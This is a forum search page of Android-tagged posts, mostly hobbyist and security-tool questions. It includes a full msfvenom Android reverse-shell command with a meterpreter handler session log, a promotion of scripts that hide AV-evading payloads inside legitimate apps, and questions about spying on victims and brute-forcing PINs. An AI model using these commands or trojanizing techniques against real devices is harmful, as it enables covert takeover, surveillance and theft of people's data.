Search the Community
Showing results for tags 'android'.
-
Bonjour à tous, Je suis nouveau ici et totalement débutant. Je cherche une charge utile pour accès à distance sur un Androïd mais je n'en trouve pas. Il en existe une avec un câble OMG mais je n'en ai pas trouvé avec Bash Bunny. Savez-vous si je peux le trouver ? Merci
-
In Android env, I want to go to the previous screen. I tried `ESCAPE` and `BACKSPACE` but was not successful. Other commands such as DOWNARROW and ENTER work correctly. The screen is in About device (in the Settings) and I want to go one screen back.
-
Hello everyone, This weekend I got a little bored and began toying with Android payloads to just toy with a meterpreter shell to see how it is. Upon doing so, I noticed the payload generated from msfvenom required I ignore my AV to install. So this sent me down a path to bypass antivirus, which come to find out WAS EXTREMELY EASY! I began with apkwash, which simply takes the msfvenom generated payload and modifies it to bypass AV. The result... 0/35 on nodistribute and confirmed manually with AVG Mobile and Kaspersky Mobile. Nice! Perfect for having physical access to a device. Now if only a ducky script could auto-download and install the payload that would make this awesome. Otherwise, you would need a couple minutes alone with their unlocked phone. Then I was wondering about attempts without having physical access. You would want a more convincing app to install. What better way other than injecting the same AV bypassing payload into a legit app? Well, some people had example on how to do this online, but required a long process to manually do it all. Why not script it? Well, each app is different so this can be hit or miss so I allowed manual pieces for those special apps. The result was apkinjector, which with utilizing the apkwash technique of AV bypass is able to make a hidden payload inside another APK. Perfect! Now, the downfall to this is APKTool has issues with certain packages (Facebook, Starbucks, etc). I have had success injecting into about 70-80% of .apk files. Github: https://github.com/jbreed/apkwash https://github.com/jbreed/apkinjector -
Already tried with pc and kingroot
-
Can you make videos on automation in non-rooted android smartphone remotely?? We know, we can write a bash/shell script and send it to someone remotely via link, if he/she clicks on link, the script will automatically execute. Can we do same in non-rooted android smartphone too?? For an instance, can we send a link to someone with a non-rooted android smartphone , if he/she clicks on link, automatically his/her email account will open, automatically a message will be written in email and it will be sent automatically. Is it possible?? I think it is same as rubber ducky
-
Hi all, Looking for a RSS reader for android. I'm specifically looking into apps for offline caching. Something with browser integration and high customizability would be great. I know most readers would do the job just fine, but I would appreciate some user experience instead of trying every single reader. Thanks in advance!
-
There are soo less commands for android in metasploit. It would be okay But i didnt find the command i needed the most. It was something like vnc_start . I dont remember but i used it in windows a long time ago and i got to see what the victim is doing etc. So how will i do it for android too.? Please help me out in this
-
private mode Galaxy S7 - Forgot Private Mode Pin
Troubled Android User posted a topic in Hacks & Mods
Hello Everyone! I have a Samsung Galaxy S7. It is running on Android version 8.0.0 and Samsung Experience 9.0. I have access to the phone but I've locked myself out of the private mode. Although the pin number can be more digits, I only used four. I'd like to know if I could use the Rubber Ducky USB and brute force my way into it but there are a few concerns… 1) My delay is 60 minutes before I can try another code. Is there a way to bypass the wait time? 2) I have numbers that I like to exclude because I've tried them. What code would I input to skip these numbers? 3) I’m pretty sure the code is between 1000 and 1999. Can I make a section of code to try these numbers first? 4) Is there a way to display the Pin that works or see when the code stops so I have it? 5) I'd also like to know if there's a better way. I've seen ADB as a suggestion but I’m not sure how to use it or navigate to the private folder to pull files. Thank you for your help! -
Can i run a payload(meterpreter) on android with rubber ducky
HackerofTR posted a topic in Questions
Can i run a payload(meterpreter)(metasploit) on android with rubber ducky or bash bunny over (wan) -
I was pointed to this by an LE contact: http://insider.foxnews.com/2018/02/07/google-tracking-you-tucker-carlsons-report-silicon-valley-surveillance-capitalism The kit used by the reporter - anyone know what it is? I can tell that these are being used: The device in the middle is a Throwing Star Lan Tap: https://greatscottgadgets.com/throwingstar/ The device on the right is an Intel CPU stick: https://www.amazon.com/Intel-Compute-Computer-processor-BOXSTK2m3W64CC/dp/B01AZC4IKK The rest of it looks like probably standard WiFi, maybe a large battery to power the whole setup. I'd guess SSLstrip or something similar to penetrate https, but what about the software being used? Anyone know what it might be? I also assume this kit isn't a package, but if so, the LE guy wants one :)
-
This is my first post, but I've had some trouble finding much searching myself, so i thought i'd maybe give it a shot here. I have been trying to find an android phone, thats cheap, yet stable enough to use with WIFI pineapple nano and as a display device for RPI 3, as well as powering a nodemcu. Now finding a cheap android smart phone, is as easy as walking into any gas station. The issue at hand is the stabilty of these devices. Sometimes they work well for a few weeks, and sometimes i have issues right off the get go. I've had a phone that continued to crash during setup, I never got past that point with it. Now i haven't tried using any of the devices I listed with a phone like such yet, but it seems like a way better idea then using a device that i've actually put money into, that I have personal information on, used social media with .etc Of course you cant be 100% anonymous using the internet or any device, but starting clean and being able to just start fresh without really hurting your wallet would be useful. Anyways. I was just wondering if anyone else has thought or acted on this sort of idea.
-
Hey all, first post here! I am working on a payload that, when connected to an unlocked Android device, will open the Gmail, attach a number of files, and then send the email. I am having issues with opening the "attach files" menu (the paperclip icon) because I cannot seem to see a way to get the keyboard to tab over to it. Here is what I have so far, tested on a Pixel XL, latest version, with a HP USB Keyboard. Windows + G > Opens Gmail CTRL + N > Create new email someone@domain.com > Enter in the desired destination email. ENTER > Confirms the email address you entered TAB TAB > Moves cursor to Subject Line > Add an email subject. TAB > Moves cursor to body. Text. > Add text to body. Magic happens? This is where I cannot click the paperclip icon, but if I do it on the touch screen, I can finish it out with the keyboard... SHIFT + DOWN ARROW > Selects file(s). SHIFT + ENTER > Attaches files. CTRL + ENTER > Send the email. Any help or thoughts would be greatly appreciated! Cheers!
-
Evening all. Trying to use my Rubber Ducky to recover a photo library off an android smartphone which is set to not share content via usb. This was done for security reasons because I co-own a small business. Upon dropping my phone I realized I locked myself out of recovering my content...but, key commands entered by an external keyboard can unlock and make changes to an android phone. My phone is NOT locked except for the basic swipe up, I think. Thoughts?
-
I'm trying to compile wifi drivers for an android device, an LG G, which is running on marshmallow and cm13 . The kernel is 3.4 , i'm not able to get the original one because it's a custom built rom . I did find on github the kernel aimed at the device and the kernel cm13 is based on. both where used to craete the rom , i presume. I'm not certain which one of the two i should use for the wifi_drivers compilation though. I have the original drivers from realtek and source code aimed at the same kernel version i.e linux-kernel-3.4 (android) No kernel-headers-generic available nor $(uname-r) would work (firmware-realtek drivers are available from kali repo(kali chroot env /nethunter 3.15 built from repo with full kalifs - all_OK ! only missing external wifi mon_mode via y-otg, got usb mounting no problem ) I still wish to be able to compile these drivers myself though. I'm not sure if a linux-kernel3.4 armhf is a universal matching kernel (which means i could use ubuntu backports for Zezty and get a linux-goldfish-armhf copy of same version i.e 3.4_0-26) or do i need to use the specific one aimed at the device or even cm13 ? This is where i'm stuck, not to mention a failed compilation over & over ... "lib modules not found .." ..etc I have gnu-arm 4.8 compiler + armhf-cross so tools are not the issue , kernel modules/headers/files is device: 'https://github.com/marxenegls/android_kernel_lge_gee'. cm13: 'https://github.com/marxenegls/cyanogenmod_kernel_grouper'. Also do i just unpack the kernel source and use make to create the header files or do i actually need to install them on my x86_64 Ubuntu laptop in particular build directory where they don't conflict with onboard kernel ? Thanks for any feedback , i'm stuck on this for days now and it's starting to seriously weigh on me -
Hi Hak5, are there any plans to release an android app to allow the configuration of the Hak5 goodies? This is something I would be willing to pay for.
-
Hi guys & girls, what is the best way to root an android tablet? The tablet in question is a Asus Zen pad z300m. was wondering if Kali linux would run on this device? if not, what can I install on the tablet to learn wireless security. Can I also install nmap?
-
I just create sample for android backdoor it's call apkgue.apk, after I run on my phone (android) I stuck to the next step.. the meterpreter > doesn't show.. why? any help for me? thanks.. msf > ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk [*] exec: ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk No platform was selected, choosing Msf::Module::Platform::Android from the payload No Arch selected, selecting Arch: dalvik from the payload No encoder or badchars specified, outputting raw payload Payload size: 8809 bytes msf > use exploit/multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp payload => android/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.43.128 lhost => 192.168.43.128 msf exploit(handler) > set lport 3344 lport => 3344 msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (android/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.43.128 yes The listen address LPORT 3344 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit [*] Exploit running as background job 0. [*] Started reverse TCP handler on 192.168.43.128:3344 msf exploit(handler) > [*] Sending stage (69089 bytes) to 192.168.43.1 [*] Meterpreter session 1 opened (192.168.43.128:3344 -> 192.168.43.1:44411) at 2017-10-19 23:02:02 +0700
-
redirect Redirect google domain CDN to my captive portal in linux
flok posted a topic in Hacks & Mods
Hello, I just found out android phone sends requests to some Google domain i.e. http://clients1.google.com/ http://clients3.google.com/ http://connectivitycheck.gstatic.com http://connectivitycheck.android.com to check if they are connected to Internet or not. I need to redirect these domains requests made by android to my captive portal in Linux after they are connected to my wifi hosted by my PC. It doesn't matter whether they access internet after redirecting to my CP. I just need to configure my AP to redirect these requests to my CP in linux. How can I do it? I am using Kali Linux 2.0 Thank you -
Hello everyone, I just purchased the Bash Bunny, i wanted to see if i could make an .APK execute on an android device. How would i go about coding that, i know that i need to call the file. It is possible that i can do that?
-
Hello, everyone I have successfully used metasploit to hack android on LAN using my own android Hotspot connection. Now, I want to know how to use metasploit over WAN using the same. I can only connect my Kali Machine to my android Hotspot connection for Internet connectivity. I have searched over net there are solutions like SSH tunneling and port forward from your android. Some are saying that your ISP must have blocked the LPORT that you have used. Some are suggesting using VPN. I am really confused what to do can anyone help me out. -
I just received my Pineapple nano today and installed everything on my laptop running Windows. I also wanted to ensure I could use the same nano on my android when I'm mobile, but I'm running into difficulties getting the android to connect to the nano. The pineapple connector app prompts for USB tethering, which is enabled, but continually attempts to connect with no result and no installation screen...just the loading circle. Any advice or assistance would be much appreciated. I wasn't sure if its because now that the pineapple nano has been setup via the Windows environment if there is an alternative way I have to connect the pineapple to interface with other environments as well (i.e. Linux/Android). Chris
-
Hello, After doing some reading on the SMB Exfiltration, would it be possible to create the same kind of payload but for an Android phone? Say for someone to connect the BB to an Android phone and copy over a certain file.
-
How would I go about getting an ARM version of ADB working on the bash bunny? I tried using Google's Python implementation of ADB, but it required libusb1 and other dependencies. The goal is to make a payload that: Enabled USB debugging (HID) Accepts connection to device (HID) ADB Install's package (bash) ADB launches package (bash) I had the HID payload working for enabling USB debugging, but then realized ADB was for x64 processors. I found a couple ARM versions, but couldn't get any of them working properly. Can anyone help me out with this. Ideally, I would like to utilize my apkwash script (https://github.com/jbreed/apkwash) to generate a lightweight payload to use for pushing onto a device. With ADB you can also attempt gaining root as well through ADB methods that otherwise wouldn't be accessible.
-
Hello, I'm trying to make a ducky script for Android and I can't find an official Ducky Script Syntax for the up/down/left/right arrows or other country specific keys. Is there any documentation on this topic?
-
Hello guys!! I really need some help. I have no idea about hacking. I purchase a rubber ducky as I saw that it is possible to enable developer options on an Android phone. I have an S5 that by an accident got the screen cracked and it works fine...but I dont see a single pixel on the screen...I can receive texts (I can her them). I need to recover my files, photos, etc. I craving for help. I need guide how to do that (enable developer options) as I found a software to recover the info but it needs the Developer Option enabled. I appreciate any help on this.
